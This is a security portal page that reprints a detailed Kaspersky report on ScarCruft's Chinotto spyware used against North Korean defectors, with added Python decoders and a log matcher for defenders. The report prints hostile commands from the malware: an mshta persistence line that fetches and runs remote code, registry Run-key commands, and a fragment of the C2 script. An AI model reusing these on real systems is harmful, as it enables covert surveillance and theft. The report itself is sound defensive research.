Security-Portal.cz is an internet portal focused on computer security, hacking, anonymity, computer networks, programming, encryption, exploits, and Linux and BSD systems. It runs a number of interesting services and supports enthusiasts in interesting projects.

Categories

New Chinotto Spyware Targets North Korean Defectors, Human Rights Activists

The Hacker News - 1 hour 7 min ago
North Korean defectors, journalists who cover North Korea-related news, and entities in South Korea are being zeroed in on by a nation-state-sponsored advanced persistent threat (APT) as part of a new wave of highly-targeted surveillance attacks. Russian cybersecurity firm Kaspersky attributed the infiltrations to a North Korean hacker group tracked as ScarCruft, also known as APT37, Reaper
Category: Hacking & Security

CleanMyMac X: Performance and Security Software for Macbook

The Hacker News - 1 hour 32 min ago
We use Internet-enabled devices in every aspect of our lives today—to find information, shop, bank, do homework, play games, and keep in touch with friends and family. As a result, our devices contain much personal information about us. Also, any great device will get a little clunky and slow over time and the Mac is no exception, and the whole "Macs don't get viruses" claim is a myth. Malware
Category: Hacking & Security

Hackers Using Compromised Google Cloud Accounts to Mine Cryptocurrency

The Hacker News - 3 hours 24 min ago
Threat actors are exploiting improperly-secured Google Cloud Platform (GCP) instances to download cryptocurrency mining software to the compromised systems as well as abusing its infrastructure to install ransomware, stage phishing campaigns, and even generate traffic to YouTube videos for view count manipulation. "While cloud customers continue to face a variety of threats across applications
Category: Hacking & Security

ScarCruft surveilling North Korean defectors and human rights activists

Kaspersky Securelist - 4 hours 20 min ago

The ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor we first reported in 2016. ScarCruft is known to target North Korean defectors, journalists who cover North Korea-related news and government organizations related to the Korean Peninsula, among others. Recently, we were approached by a news organization with a request for technical assistance during their cybersecurity investigations. As a result, we had an opportunity to perform a deeper investigation on a host compromised by ScarCruft. The victim was infected by PowerShell malware and we discovered evidence that the actor had already stolen data from the victim and had been surveilling this victim for several months. The actor also attempted to send spear-phishing emails to the victim’s associates working in businesses related to North Korea by using stolen login credentials.

Based on the findings from the compromised machine, we discovered additional malware. The actor utilized three types of malware with similar functionalities: versions implemented in PowerShell, Windows executables and Android applications. Although intended for different platforms, they share a similar command and control scheme based on HTTP communication. Therefore, the malware operators can control the whole malware family through one set of command and control scripts.

We were working closely with a local CERT to investigate the attacker’s command and control infrastructure and, as a result, we were able to better understand how it works. The APT operator controls the malware using a PHP script on the compromised web server and controls the implants based on the HTTP parameters. We were also able to acquire several log files from the compromised servers. Based on those files, we identified additional victims in South Korea and compromised web servers that have been utilized by ScarCruft since early 2021. Additionally, we discovered older variants of the malware, delivered via HWP documents, dating back to mid-2020.

More information about ScarCruft is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Spear-phishing document

Before spear-phishing a potential victim and sending a malicious document, the actor contacted an acquaintance of the victim using the victim’s stolen Facebook account. The actor already knew that the potential target ran a business related to North Korea and asked about its current status. After a conversation on social media, the actor sent a spear-phishing email to the potential victim using a stolen email account. The actor leveraged their attacks using stolen login credentials, such as Facebook and personal email accounts, and thereby showed a high level of sophistication.

After a Facebook conversation, the potential target received a spear-phishing email from the actor. It contains a password-protected RAR archive with the password shown in the email body. The RAR file contains a malicious Word document.

Spear-phishing email and decoy

This document contains a lure related to North Korea.

MD5: baa9b34f152076ecc4e01e35ecc2de18
File name: 북한의 최근 정세와 우리의 안보.doc (North Korea’s latest situation and our national security)
Modified time: 2021-09-03 09:34:00
Author: Leopard
Last saved user: Cloud

This document contains a malicious macro and a payload for a multi-stage infection process. The first stage’s macro contains obfuscated strings and then spawns another macro as a second stage.

The first stage macro checks for the presence of a Kaspersky security solution on the victim’s machine by trying the following file paths:

  • C:\Windows\avp.exe # Kaspersky AV
  • C:\Windows\Kavsvc.exe # Kaspersky AV
  • C:\Windows\clisve.exe # Unknown

If a Kaspersky security solution is indeed installed on the system, it enables trust access for Visual Basic Application (VBA) by setting the following registry key to ‘1’:

HKEY_CURRENT_USER\Software\Microsoft\Office\[Application.Version]\Word\Security\AccessVBOM

By doing so, Microsoft Office will trust all macros and run any code without showing a security warning or requiring the user’s permission. Next, the macro creates a mutex named ‘sensiblemtv16n’ and opens the malicious file once more. Thanks to the “trust all macros” setting, the macro will be executed automatically.

If no Kaspersky security software is installed, the macro proceeds directly to decrypting the next stage’s payload. To do so, it uses a variation of a substitution cipher: for each character of the encrypted string, the script looks the character up in one of two fixed strings to obtain its index, then reads the decrypted character at that index from the other string.

  • First string: BU+13r7JX9A)dwxvD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V&tC,uYz=Z0RS8aM4Fqn
  • Second string: v&tC,uYz=Z0RS8aM4FqnD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V7JX9A)dwxBU+13r
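The two-alphabet substitution described above can be reversed with a few lines of code, which is how an analyst recovers the macro’s strings statically instead of letting the document run. The following Python decoder is an added example, not code from the report or from Kaspersky; the two alphabets are the ones quoted above, and the VBA snippet it decodes is constructed (its literal is produced by the inverse mapping, not taken from the real macro).

```python
import re

# The two alphabets quoted in the report for the first-stage macro's string obfuscation.
FIRST = "BU+13r7JX9A)dwxvD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V&tC,uYz=Z0RS8aM4Fqn"
SECOND = "v&tC,uYz=Z0RS8aM4FqnD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V7JX9A)dwxBU+13r"

# Position tables built once; every character is unique within each string,
# so each table is a bijection (verified by alphabets_are_consistent()).
_POS_IN_FIRST = {ch: i for i, ch in enumerate(FIRST)}
_POS_IN_SECOND = {ch: i for i, ch in enumerate(SECOND)}


def alphabets_are_consistent():
    """Both strings must be the same 71-character permutation of one alphabet,
    otherwise the substitution would not be reversible."""
    return len(FIRST) == len(SECOND) == 71 and len(set(FIRST)) == 71 and set(FIRST) == set(SECOND)


def decode(obfuscated):
    """Look each character up in SECOND and emit the character found at that index in FIRST.
    Characters outside the alphabet (space, quotes, ...) are passed through unchanged."""
    return "".join(FIRST[_POS_IN_SECOND[ch]] if ch in _POS_IN_SECOND else ch for ch in obfuscated)


def encode(plain):
    """Inverse of decode(); used to build test data and to confirm the mapping is reversible."""
    return "".join(SECOND[_POS_IN_FIRST[ch]] if ch in _POS_IN_FIRST else ch for ch in plain)


def decode_string_literals(vba_source):
    """Decode every double-quoted literal in a VBA snippet, the way an analyst triages an
    obfuscated macro without executing it."""
    return [decode(lit) for lit in re.findall(r'"([^"]*)"', vba_source)]


# Constructed sample: the literal is encode("notepad.exe"), not a string from the real macro.
SAMPLE_VBA = 'target = "' + encode("notepad.exe") + '"'

if __name__ == "__main__":
    print(decode_string_literals(SAMPLE_VBA))
```

If the real macro turns out to look characters up in the first string and read from the second, swap the two constants; the round trip `decode(encode(x)) == x` holds either way, so the check in `alphabets_are_consistent()` is the part worth keeping when adapting this to a new sample.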

The decrypted second stage Visual Basic Application (VBA) contains shellcode as a hex string. This script is responsible for injecting the shellcode into the process notepad.exe.

Shellcode in the second stage VBA

The shellcode contains the URL to fetch the next stage payload. After fetching the payload, the shellcode decrypts it with trivial single-byte XOR decryption. Unfortunately, we weren’t able to gather the final payload when we investigated this sample.

The payload’s download path is:

hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4VHg/root/content

Host investigation

As a result of our efforts in helping the victim with the analysis, we had a chance to investigate the host of the owner who sent the spear-phishing email. When we first checked the process list, there was a suspicious PowerShell process running with a rather suspicious parameter.

This PowerShell command was registered via the Run registry key as a mechanism for persistence:

  • Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run – ONEGO
  • Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 300000 2.2.2.2 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html

This registry key causes the HTML Application (HTA) file to be fetched and executed by the mshta.exe process every time the system boots. The fetched ‘1.html’ is an HTML Application (.hta) file that contains Visual Basic Script (VBS), which eventually executes PowerShell commands.

The PowerShell script offers simple backdoor functionalities and continuously queries the C2 server with HTTP POST requests containing several parameters. At first, it sends a beacon to the C2 server with the host name:

hxxp://[redacted].cafe24[.]com/bbs/probook/do.php?type=hello&direction=send&id=[host name]

Next, it attempts to download commands from the C2 server with the following format:

hxxp://[redacted].cafe24[.]com/bbs/probook/do.php??type=command&direction=receive&id=

If the HTTP response from the C2 server is 200, it checks the response data and executes the delivered commands.

Delivered data / Description:
  • ref: Send a beacon to the C2 server. HTTP request: ?type=hello&direction=send&id=
  • cmd: If the command data includes ‘start’, execute the given command with cmd.exe and send base64-encoded ‘OK’ using the POST format below. Otherwise, execute the given command, redirecting the result to the result file (%APPDATA%\desktop.dat), and send the contents of the file after base64 encoding. HTTP request: ?type=result&direction=send&id=

We discovered additional malware, tools and stolen files from the victim’s host. Due to limited access to the compromised host, we were unable to figure out the initial infection vector. However, we assess this host was compromised on March 22, 2021, based on the timestamp of the suspicious files. One characteristic of the malware we discovered from the victim is the writing of execution results from commands to the file “%appdata%\desktop.dat”. According to the Master File Table (MFT) information, this file was created the same day, March 22, 2021, and the last modification time is on September 8, 2021, which means this file was used until just before our investigation.

Using the additional tools, the malware operator collected sensitive information from this victim, although we can’t assess exactly how much data was exfiltrated and what kind of data was stolen. Based on the timestamp of the folders and files created by the malware, the actor collected and exfiltrated files as early as August 2021. The log files with the .dat extension are encrypted, but can be decrypted with the one-byte XOR key 0x75. These log files contain the uploading history. We found two log files and each of them contains slightly different logs. The ‘B14yNKWdROad6DDeFxkxPZpsUmb.dat’ file contains zipping and uploading of the folder bearing the same name. The log file presents the process as: “Zip Dir Start > Up Init > Up Start > Up File Succeed > Zip Dir Succeed”. According to the log file, the malware operator collected something from the infected system in this folder and uploaded it after archiving.

File archiving and uploading log

The other log file, named “s5gRAEs70xTHkAdUjl_DY1fD.dat”, also contains a file uploading history, except for file zipping messages. It processes each file with this procedure: “Up Init > Up Start > Up File Succeed”.

File uploading log

Based on what we found from this victim, we can confirm that the malware operator collected screenshots and exfiltrated them between August 6, 2021 and September 8, 2021. Based on what we found out from the victim, we can summarize the whole infection timeline. We suspect this host was compromised on March 22, 2021. After the initial infection, the actor attempted to implant additional malware, but an error occurred that led to the crash of the malware. The malware operator later delivered the Chinotto malware in August 2021 and probably started to exfiltrate sensitive data from the victim.

Timeline of the attack on the victim

Windows executable Chinotto

As a result of the host investigation, we discovered a malicious Windows executable and found additional malware variants from VirusTotal and our own sample collection. One of the Windows executables contains a build path and the malware author appears to call the malware “Chinotto”.

PDB path

The technical specifications in this analysis are based on the Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) we discovered from the host investigation. One of the characteristics of this malware is that it contains a lot of garbage code to impede analysis. During runtime, the malware copies unused data to the allocated buffer before copying the real value; or allocates an unused buffer, filling it with meaningless data, and never uses it.

It also restores functional strings such as C2 addresses and debugging messages to the stack at runtime. The malware creates a mutex and fetches the C2 addresses, which are different for each sample we discovered:

Mutex: NxaNnkHnJiNAuDCcoCKRAngjHVUZG2hSZL03pw8Y
C2 address: hxxp://luminix.openhaja[.]com/bbs/data/proc1/proc.php

In order to generate the identification value of the victim, the malware acquires both computer and user name and combines them in the format ‘%computer name%_%user name%’. Next, it encrypts the acquired string with the XOR key ‘YFXAWSAEAXee12D4’ and encodes it with base64.
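Two of the artefacts described so far are recoverable with plain XOR: the .dat upload logs from the host investigation (one-byte key 0x75, with the “Zip Dir Start > Up Init > …” stages) and the victim identifier just described (repeating key ‘YFXAWSAEAXee12D4’, then base64). The helper below is an added example, not code from the report or from Kaspersky. The keys and stage names come from the report; the encrypted log sample is constructed and assumes one stage name per line, which the report does not state.

```python
import base64
from itertools import cycle

# Keys quoted in the report.
LOG_XOR_KEY = bytes([0x75])             # one-byte key on the *.dat upload logs
ID_XOR_KEY = b"YFXAWSAEAXee12D4"        # repeating key on the '%computer name%_%user name%' identifier

# Stage names the report lists for the upload history; the one-per-line layout is an assumption.
UPLOAD_STAGES = ("Zip Dir Start", "Up Init", "Up Start", "Up File Succeed", "Zip Dir Succeed")


def xor_bytes(data, key):
    """XOR data against a repeating key. XOR is symmetric, so this both encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decrypt_log(blob):
    """Recover the plaintext of an encrypted upload log (the B14y... / s5gR... .dat files)."""
    return xor_bytes(blob, LOG_XOR_KEY).decode("utf-8", errors="replace")


def upload_stages(log_text):
    """Return the stage names in the order they appear, so a responder can tell whether an
    archive-and-upload run completed ('Up File Succeed' / 'Zip Dir Succeed' present) or aborted."""
    return [line.strip() for line in log_text.splitlines() if line.strip() in UPLOAD_STAGES]


def decode_victim_id(encoded_id):
    """Turn the base64 id carried in a beacon back into 'COMPUTER_user'.
    Assumes ASCII host and user names, as the report's format string implies."""
    return xor_bytes(base64.b64decode(encoded_id), ID_XOR_KEY).decode("ascii", errors="replace")


def encode_victim_id(computer, user):
    """Same transformation in the other direction: used to build known test input, and to
    compute the id an already-identified host would carry when searching proxy logs for it."""
    raw = xor_bytes(f"{computer}_{user}".encode("ascii"), ID_XOR_KEY)
    return base64.b64encode(raw).decode("ascii")


# Constructed sample: one complete archive-and-upload run, stored the way the malware stores it.
SAMPLE_LOG_PLAINTEXT = "Zip Dir Start\nUp Init\nUp Start\nUp File Succeed\nZip Dir Succeed\n"
SAMPLE_LOG_ENCRYPTED = xor_bytes(SAMPLE_LOG_PLAINTEXT.encode("utf-8"), LOG_XOR_KEY)

if __name__ == "__main__":
    print(upload_stages(decrypt_log(SAMPLE_LOG_ENCRYPTED)))
    print(decode_victim_id(encode_victim_id("DESKTOP-01", "alice")))
```

Base64 output can contain ‘+’, ‘/’ and ‘=’, so an id copied from a proxy log may be URL-encoded; run it through `urllib.parse.unquote` before `decode_victim_id` if the decode fails.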

The backdoor continuously queries the C2 server, awaiting commands from the malware operator. We observed an early version of Chinotto malware (MD5 55afe67b0cd4a01f3a9a6621c26b1a49) which, while it also follows this simple principle, uses a hard-coded backdoor command ‘scap’. This means this specific sample is only designed for exfiltrating the victim’s screenshot.

The Chinotto malware shows fully fledged capabilities to control and exfiltrate sensitive information from the victims.

Command / Description:
  • ref: Send beacon to the C2 server: http://[C2 URL]?ref=id=%s&type=hello&direction=send
  • cmd: Execute Windows commands and save the result to the %APPDATA%\s5gRAEs70xTHkAdUjl_DY1f.dat file after encrypting with a one-byte XOR key
  • down: Download file from the remote server
  • up: Upload file
  • state: Upload log file (s5gRAEs70xTHkAdUjl_DY1fD.dat)
  • regstart: Copy the current malware to the CSIDL_COMMON_DOCUMENTS folder and execute a command to register the file in the Run registry key: “reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v a2McCq /t REG_SZ /d %s /f”
  • cleartemp: Remove files from the folder “%APPDATA%\s5gRAEs70xTHkAdUjl_DY1fD”
  • updir: Archive a directory and upload it. The archive is XOR encoded using the same key used when creating the identification value: ‘YFXAWSAEAXee12D4’
  • init: Collect files with the following extensions from the paths CSIDL_DESKTOP, CSIDL_PERSONAL (CSIDL_MYDOCUMENTS), CSIDL_MYMUSIC, CSIDL_MYVIDEO and Downloads, and upload them to the C2 server: jpg|jpeg|png|gif|bmp|hwp|doc|docx|xls|xlsx|xlsm|ppt|pptx|pdf|txt|mp3|amr|m4a|ogg|aac|wav|wma|3gpp|eml|lnk|zip|rar|egg|alz|7z|vcf|3gp
  • scap: Take a screenshot and save it to the folder “%appdata%\s5gRAEs70xTHkAdUjl_DY1fD” in an archived format. The file storing the screenshot has an ‘e_’ prefix and 10 randomly generated characters as a filename. When uploading the screenshot file, it uses ‘wrpdwRwsFEse’ as the filename
  • run: Run Windows commands with the ShellExecuteW API
  • chdec: Download an encrypted file and decrypt it via the CryptUnprotectData API
  • update: Download updated malware and register it: reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v m4cVWKDsa9WxAWr41iaNGR /t REG_SZ /d %s /f
  • wait: Sleep for 30 minutes
  • wakeup: Wake up after 2.5 seconds

Another malware sample (MD5 04ddb77e44ac13c78d6cb304d71e2b86) that demonstrated a slight difference during runtime was discovered from the same victim. This is the same fully featured backdoor, but it loads the backdoor command using a different scheme. The malware checks for the existence of a ‘*.zbpiz’ file in the same folder. If it exists, it loads the file’s content and uses it as a backdoor command after decrypting. The malware authors keep changing the capabilities of the malware to evade detection and create custom variants depending on the victim’s scenario.

In addition, there are different Windows executable variants of the Chinotto malware. Apart from the conventional Chinotto malware mentioned above, a different variant contains an embedded PowerShell script. The spawned PowerShell command has similar functionality to the PowerShell we found from the victim. However, it contains additional backdoor commands, such as uploading and downloading capabilities. Based on the build timestamp of the malware, we assess that the malware author used the PowerShell embedded version from mid-2019 to mid-2020 and started to use the malicious, PowerShell-less Windows executable from the end of 2020 onward.

Android Chinotto

Based on the C2 communication pattern, we discovered an Android application version of Chinotto malware (MD5 56f3d2bcf67cf9f7b7d16ce8a5f8140a). This malicious APK requests excessive permissions according to the AndroidManifest.xml file. To achieve its purpose of spying on the user, these apps ask users to enable various sorts of permissions. Granting these permissions allows the apps to collect sensitive information, including contacts, messages, call logs, device information and audio recordings. Each sample has a different package name, with the analyzed sample bearing “com.secure.protect” as a package name.

The malware sends its unique device ID in the same format as the Windows executable version of Chinotto.

Beacon URI pattern: [C2 url]?type=hello&direction=send&id=[Unique Device ID]

Next, it receives a command after the following HTTP request:

Retrieve commands: [C2 url]?type=command&direction=receive&id=[Unique Device ID]

If the delivered data from the C2 server is not “ERROR” or “Fail”, the malware starts to carry out backdoor operations.

Command / URI pattern / Description:
  • ref (?type=hello&direction=send&id=): Send the same beacon request to the C2 server
  • down (?type=file&direction=send&id=): Upload the temporary file (/sdcard/.temp-file.dat) to the C2 server and remove it from local storage
  • UriP (?type=file&direction=send&id=): Save the temporary file path to the result file (/sdcard/result-file.dat) and upload the temporary file
  • UploadInfo (?type=hello&direction=send&id= followed by ?type=file&direction=send&id=): After sending a beacon, collect the following information into the /icloud/tmp-web path, then upload the collected files after archiving. The archive is encrypted with AES and the key “3399CEFC3326EEFF”:
      • Info.txt: Phone number, IP address, SDK version (OS version), temporary file path
      • Sms.txt: All text messages in JSON format
      • Calllog.txt: All call logs in JSON format
      • Contact.txt: All contact lists in JSON format
      • Account.txt: All account information in JSON format
  • UploadFile (?type=file&direction=send&id=): Execute the command ‘cd /sdcard;ls -alR’, save the result to the temporary file (/sdcard/.temp-file.dat) and upload it. Upload all thumbnails and photos after encrypting them with AES and the key “3399CEFC3326EEFF”
  • ETC (?type=file&direction=send&id=): Execute a command, save the result to the result file (/sdcard/result-file.dat) and upload the result

We found that the actor had an interest in a more specific file list in one variant (MD5 cba17c78b84d1e440722178a97886bb7). The ‘UploadFile’ command of this variant uploads specific files to the C2 server.  The AMR file is an audio file generally used for recording phone calls. Also, Huawei cloud and Tencent services are two of the targets. To surveil the victim, the list includes target folders as well as /Camera, /Recordings, /KakaoTalk (a renowned Korean messenger), /문건(documents), /사진(pictures) and /좋은글(good articles).

Targeted files and folders

To sum up, the actor targeted victims with a probable spear-phishing attack for Windows systems and smishing for Android systems. The actor leverages Windows executable versions and PowerShell versions to control Windows systems. We may presume that if a victim’s host and mobile are infected at the same time, the malware operator is able to overcome two-factor authentication by stealing SMS messages from the mobile phone. After a backdoor operation with a fully featured backdoor, the operator is able to steal any information they are interested in. Using the stolen information, the actor further leverages their attacks. For example, the group attempts to infect additional valuable hosts and contact potential victims using stolen social media accounts or email accounts.

Attack procedure

Older malicious HWP documents

The threat actor behind this campaign delivered the same malware with a malicious HWP file. At that time, lures related to COVID-19 and credential access were used.

  • HWP hash: f17502d3e12615b0fa8868472a4eabfb; HWP file name: 코로나19 재감염 사례-백신 무용지물.hwp (Covid-19 reinfection case-Useless vaccine.hwp); dropped payload hash: 72e5b8ea33aeb083631d1e8b302e76af (Visual Basic Script)
  • HWP hash: c155f49f0a9042d6df68fb593968e110; HWP file name: 계정기능 제한 안내.hwp (Notice of limitation of account.hwp); dropped payload hash: 5a7ef48fe0e8ae65733db64ddb7f2478 (Windows executable)

The Visual Basic Script created by the first HWP file (MD5 f17502d3e12615b0fa8868472a4eabfb) has similar functionalities to the Chinotto malware. It also uses the same HTTP communication pattern. The second payload dropped from the malicious HWP is a Windows executable executing an embedded PowerShell script with the same functionalities. These discoveries reveal related activity dating back to at least mid-2020.

Infrastructure

In this campaign, the actor relied solely on compromised web servers, mostly located in South Korea. During this research we worked closely with the local CERT to take down the attacker’s infrastructure and had a chance to look into one of the scripts on the C2 servers that control the Chinotto malware. The C2 script (named “do.php”) uses several predefined files to save the client’s status (shakest) and commands (comcmd). Also, it parses several parameters (id, type, direction, data) delivered by the HTTP request from the implant:

$type = ""; # 'type' parameter
$shakename = "shakest"; # Save client status
$comcmdname = "comcmd"; # Save commands
$btid = ""; # Client unique ID
$direction = ""; # 'direction' parameter
$data = ""; # 'data' parameter
if (isset($_GET['id'])){ $btid = $_GET['id']; }
if (isset($_GET['type'])){ $type = $_GET['type']; }
if (isset($_GET['direction'])){ $direction = $_GET['direction']; }
if (isset($_GET['data'])){ $data = $_GET['data']; }
..
$comname = $btid."";
$comresname = $comname . "-result";

In order to control the client, the C2 script uses HTTP parameters. First, it checks the value of the ‘type’ parameter. The ‘type’ parameter carries four values: hello, command, result, and file.

Value of ‘type’ param / Description:
  • hello: Report and control the client status
  • command: Hold the command from the operator or retrieve the command from the client
  • result: Upload the command execution result or retrieve the command
  • file: Upload file to the C2 server

‘hello’ type

When the script receives the ‘type=hello’ parameter, it checks the value of ‘direction’. In this routine, the script checks the status of the client. The malware operator saves the client status to a specific file, the ‘shakest’ file in this case. If the ‘send’ value is being received, the client status is set to ‘ON’. If ‘receive’ is set as well, the client’s status log file is sent (likely in order to send the status of clients to the malware operator). The ‘refresh’ value is for setting all clients to ‘OFF’ and ‘release’ is used to initialize the command file. The client just replies ‘OK’.

‘type=hello’ commands

‘command’ type

In order to manage the implant’s commands, the C2 script handles several additional parameters. If the ‘type=command’ alongside ‘direction=receive’ is set, it issues a request from the client to retrieve a command.

There are two kinds of command files: common commands like an initial command or commands sent to all clients, and individual commands for a specific client. If an individual command exists for a client, it delivers it. Otherwise, the client is sent a common command. If the ‘direction’ parameter is set to ‘send’, the request is coming from the malware operator in order to save the sent command in the C2 server. Using this request, the operator can set two commands files: common command or individual command. If the ‘botid’ parameter contains ‘cli’, it means this request is for setting a common command file. If the ‘data’ parameter contains ‘refclear:’, the common command file gets initialized. Otherwise, the ‘data’ value is saved to the common command file. If ‘botid’ is not ‘cli’, it means this request is directed to an individual command file. The process of saving the individual command file is the same as the process used for saving the common command.

type=command commands

‘result’ type

When uploading command execution results coming from the implant, the script sets the ‘type’ parameter to ‘result’. If the ‘direction’ parameter equals ‘send’, it saves the value of the ‘data’ parameter to the individual result file: “[botid]-result”. The ‘receive’ value of the ‘direction’ parameter means retrieving the individual result file. The script then sends the result file to the operator after encoding it with base64.

‘file’ type

The last possible ‘type’ command is ‘file’. This value is used for exfiltrating files from the victim. If a file upload succeeds, the script sends the message ‘SEND SUCCESS’. Otherwise, it sends ‘There was an error uploading the file, please try again!’.
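The ‘type’/‘direction’ pairs documented for do.php are the same beacon, command-poll, result and file URIs the PowerShell, Windows and Android implants use in the earlier sections, which makes them a usable signature for web-server access logs on a suspected C2 host or for outbound proxy logs. The script below is an added example, not code from the report or from Kaspersky; the access-log lines, IP addresses and implant ids in it are constructed, and it assumes the common log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); hosts, timestamps and ids are invented.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [22/Mar/2021:09:14:02 +0900] "GET /bbs/probook/do.php?type=hello&direction=send&id=WS-17 HTTP/1.1" 200 2
10.0.0.5 - - [22/Mar/2021:09:14:03 +0900] "GET /bbs/probook/do.php?type=command&direction=receive&id=WS-17 HTTP/1.1" 200 14
10.0.0.5 - - [22/Mar/2021:09:14:09 +0900] "POST /bbs/probook/do.php?type=result&direction=send&id=WS-17 HTTP/1.1" 200 2
10.0.0.9 - - [22/Mar/2021:09:20:11 +0900] "GET /bbs/data/proc1/proc.php?ref=id=QUJDRA==&type=hello&direction=send HTTP/1.1" 200 2
10.0.0.9 - - [22/Mar/2021:09:21:40 +0900] "POST /bbs/data/proc1/proc.php?type=file&direction=send&id=QUJDRA== HTTP/1.1" 200 12
10.0.0.7 - - [22/Mar/2021:10:01:00 +0900] "GET /index.php?type=hello HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Meaning of each (type, direction) pair as documented for the do.php script.
PHASES = {
    ("hello", "send"): "beacon",
    ("command", "receive"): "command-poll",
    ("result", "send"): "result-upload",
    ("file", "send"): "file-exfil",
}


def classify_request(line):
    """Return (source_ip, implant_id, phase) for a line matching the Chinotto C2 scheme, else None.
    A lone 'type=hello' without 'direction' (last sample line) is not enough to match."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["target"]).query)
    qtype = params.get("type", [None])[0]
    direction = params.get("direction", [None])[0]
    phase = PHASES.get((qtype, direction))
    if phase is None:
        return None
    implant_id = params.get("id", [None])[0]
    # The Windows executable nests the id inside 'ref' (?ref=id=<id>&type=hello&direction=send).
    if implant_id is None and params.get("ref", [""])[0].startswith("id="):
        implant_id = params["ref"][0][3:]
    return m["src"], implant_id, phase


def summarize(log_text):
    """Group matched requests by implant id: the phases each one reached, in order, and from where.
    An id that reaches 'file-exfil' or 'result-upload' is a confirmed active implant, not just a beacon."""
    summary = {}
    for line in log_text.splitlines():
        hit = classify_request(line)
        if hit:
            src, implant_id, phase = hit
            entry = summary.setdefault(implant_id, {"sources": set(), "phases": []})
            entry["sources"].add(src)
            if phase not in entry["phases"]:
                entry["phases"].append(phase)
    return summary


if __name__ == "__main__":
    for implant_id, entry in summarize(SAMPLE_ACCESS_LOG).items():
        print(implant_id, sorted(entry["sources"]), " > ".join(entry["phases"]))
```

The match is on the parameter pair rather than on the script name, because the report lists C2 paths named do.php, proc.php, update.php and pu.php; the parameter scheme is the stable part.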

We discovered that the malware operator used a separate webpage to monitor and control the victims. From several compromised C2 servers we see a control page carrying a ‘control.php’ file name.

Control page from this case

The control page shows a simple structure. The operator can see a list of infected hosts in the left panel with the corresponding status “ON” or “OFF”. Based on this information, the operator is able to issue a command using the right panel and watch the result from the client.

Victims

We began this research by providing support to human rights activists and defectors from North Korea against an actor seeking to surveil and track them.

Additionally, we discovered further victims we couldn’t profile from analyzing the C2 servers. From analyzing the attacker’s infrastructure, we found 75 client connections between January 2021 and February 2021. Most IP addresses seem to be Tor or VPN connections, which are likely to be either from researchers or the malware operators.

Analyzing other C2 servers, we found more information about possible additional victims. Excluding connections coming from Tor, there are only connections coming from South Korea. Based on the IP addresses, we could distinguish four different suspected victims located in South Korea, and determine their operating system and browser used based on user-agent information:

Victim A connected to the C2 server from July 16 to September 5 and has outdated versions of Windows OS and Internet Explorer. Victim B connected to this server on September 4 and operates Windows 8 and Internet Explorer 10. While we were investigating the C2 server, Victim D kept connecting to it, using Windows 10 with Chrome version 78.

Timeline of victims

To sum up, this campaign is targeting entities in South Korea, which is a top point of interest for ScarCruft. Based on our findings, we also assume that the threat actor targeted individuals rather than specific companies or organizations.

Attribution

We discovered several code overlaps with old ScarCruft malware named POORWEB. At first, when Chinotto malware uploads the file to the C2 server, it uses the HTTP POST request with a boundary generated with a random function. When Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) generates a boundary value, it executes the random() function twice and concatenates each value. The generation process is not exactly the same, but it utilizes a similar scheme as the old POORWEB malware (MD5 97b35c34d600088e2a281c3874035f59).

HTTP boundary generation routine

Moreover, there is additional code overlap with Document Stealer malware (MD5 cff9d2f8dae891bd5549bde869fe8b7a) that was previously utilized with POORWEB malware. When the Chinotto malware checks the response from the C2 server, it checks whether the response is ‘HTTP/1.1 200 OK’ and not ‘error’. This Document Stealer malware also has the same routine to check responses from the C2 server.

C2 response check routine

Apart from code similarity, the ScarCruft group has historically been known to surveil individuals related to North Korea such as journalists, defectors, diplomats and government employees. The target of this attack is within the same scope as previous ScarCruft group campaigns. Based on the victimology and several code overlaps, we assess with medium confidence that this cyber-espionage operation is related to the ScarCruft group.

Conclusions

Many journalists, defectors and human rights activists are targets of sophisticated cyberattacks. Unlike corporations, these targets typically don’t have sufficient tools to protect against and respond to highly skilled surveillance attacks. One of the purposes of our team is to help individuals targeted by APT groups. This research stemmed from this kind of endeavor. Our collaboration with the local CERT allowed us to gain a unique look into ScarCruft’s infrastructure setup and allowed us to discover many technical details.

Using these findings, we found additional Android variants of the same malware, which has been invaluable in understanding and tracking ScarCruft TTPs. Moreover, while hunting for related activity, we uncovered an older set of activity dating back to mid-2020, possibly indicating that ScarCruft operations against this set of individuals have been operating for a longer period of time.

Indicators of compromise

Malicious documents

baa9b34f152076ecc4e01e35ecc2de18 북한의 최근 정세와 우리의 안보.doc
7d5283a844c5d17881e91a5909a5af3c 화학원료.doc (similar document)

HTA file

e9e13dd4434e2a2392228712f73c98ef 1.html

Windows executable Chinotto

00df5bbac9ad059c441e8fef9fefc3c1 alyakscan.exe
04ddb77e44ac13c78d6cb304d71e2b86 anprotect5.exe
55afe67b0cd4a01f3a9a6621c26b1a49
93bcbf59ac14e14c1c39a18d8ddf28ee

PowerShell embedded Chinotto

c7c3b03108f2386022793ed29e621343
5a7ef48fe0e8ae65733db64ddb7f2478
b06c203db2bad2363caed1c0c11951ae
f08d7f7593b1456a087eb9922507c743
